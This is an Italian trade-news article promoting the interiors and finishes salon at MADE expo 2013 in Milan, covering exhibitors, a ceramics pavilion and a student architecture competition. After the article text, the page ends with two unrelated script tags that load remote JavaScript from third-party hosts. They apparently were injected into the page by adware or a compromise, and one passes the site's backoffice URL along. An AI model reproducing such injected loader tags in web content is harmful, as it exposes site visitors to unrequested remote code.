1. Home
  2. Notizie e Mercato
  3. Made interni e finiture

Made interni e finiture

Arredamento e Mobili di
5/5
votato da 1 persone
A fronte di una sempre maggiore richiesta di qualità degli spazi abitativi, il Salone MADE INTERNI E FINITURE, è il luogo in cui trovare l’intera gamma dei prodotti per l’architettura degli interni


Grande attenzione è posta sulle caratteristiche dei materiali e sul loro uso, agevolando l’incontro tra le imprese espositrici e i target di riferimento quali progettisti, architetti, interior designer, imprese di costruzione, contractor, responsabili di show room, che hanno la possibilità di trovare in un unico luogo le soluzioni più innovative per qualificare gli spazi dell’abitare testimoniate dalla presenza di porte, pavimenti e rivestimenti, scale, pannelli e componenti per il design presentati dalle aziende più qualificate del comparto.

Le aziende sono consapevoli dell’importanza di MADE expo e per questo continuano a dare fiducia ad una manifestazione che dà ampio spazio a soluzioni di design e a proposte innovative e di tendenza, come afferma Dario Vaccari presidente di ALIAS Porte blindate: “Partecipiamo da sempre a MADE expo perché è un’importante vetrina internazionale dell’edilizia e delle costruzioni. Innovazione, qualità e design sono i valori che ALIAS Porte blindate, azienda leader nel settore porte blindate vuole promuovere nel mondo attraverso una produzione totalmente made-in-Italy”.

Novità assoluta della prossima edizione è “MADE 4 CERAMICS”: un intero padiglione metterà a disposizione dei visitatori le qualità del prodotto ceramico. Uno spazio che si configura non come una semplice area espositiva, ma come un luogo in cui si incontrano anche ricerca e sviluppo e in cui le eccellenze del settore danno vita ad un percorso interattivo e virtuoso per illustrare e fare emergere al meglio le caratteristiche, le applicazioni e le qualità della ceramica nel soddisfare le esigenze del mondo delle costruzioni.

Spazio ai giovani talenti con la nuova edizione di Instant house, il concorso dedicato agli studenti e neolaureati in Architettura, Ingegneria ed Industrial Design, che dovranno cimentarsi nella realizzazione di progetti che propongano nuove modalità dell’abitare e della socialità urbana.

InstantHouse @ School è il tema dell’edizione 2013, che richiede la progettazione di una scuola dell’infanzia per bambini dai 3 ai 6 anni, che rifletta una diversa modalità di percepire e conoscere il paesaggio, l’ambiente e il territorio da parte dei bambini attraverso un progetto che esprima una forte relazione tra architettura e natura, tra interno ed esterno.
.
Il concorso, a cui è possibile iscriversi fino al 3 giugno, è promosso da FederlegnoArredo in collaborazione con il DAStU, Dipartimento di Architettura e Studi Urbani e Politecnico di Milano. I progetti vincitori e gli altri segnalati dalla Giuria verranno esposti a MADE expo 2013, dove verrà realizzato, inoltre, un prototipo del progetto vincitore in scala reale.

Con Material Connexion, a MADE expo c’è spazio anche per i materiali performanti e sostenibili per porre l’attenzione sulle qualità dei materiali destinati alle superfici e al mondo del design.
L’attenzione di MADE expo verso materiali e risorse centrali per il settore si estende anche al legno: Componiamo il Design è l’iniziativa legata alla promozione dei pannelli come soluzione ideale anche per l’interior design e l’arredamento, contribuendo così anche alla riduzione delle emissioni di CO2 e al rispetto dell’ambiente grazie alle sue proprietà ecosostenibili.

MADE expo è anche un’occasione per favorire l’export e la penetrazione delle aziende sui mercati strategici per il settore: la manifestazione approfondisce la propria vocazione e il proprio sguardo verso i mercati esteri rinnovando l’appuntamento in fiera con l’ International Business Lounge per realizzare un grande progetto di relazione e incontri diretti tra operatori esteri e aziende espositrici.

MADE expo dà valore alle tematiche della progettazione e della costruzione degli spazi interni, dando maggior risalto al settore all’interno del SALONE INTERNI E FINITURE, che si identifica come punto di riferimento completamente dedicato alle aziende e ai professionisti del comparto, il luogo deputato a ospitare le migliori soluzioni per scale, rivestimenti, pavimenti e finiture per gli spazi interni che rispondono a tutte le nuove esigenze del progettare moderno.

Appuntamento con MADE expo dal 2 al 5 ottobre 2013 a Fiera Milano Rho.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>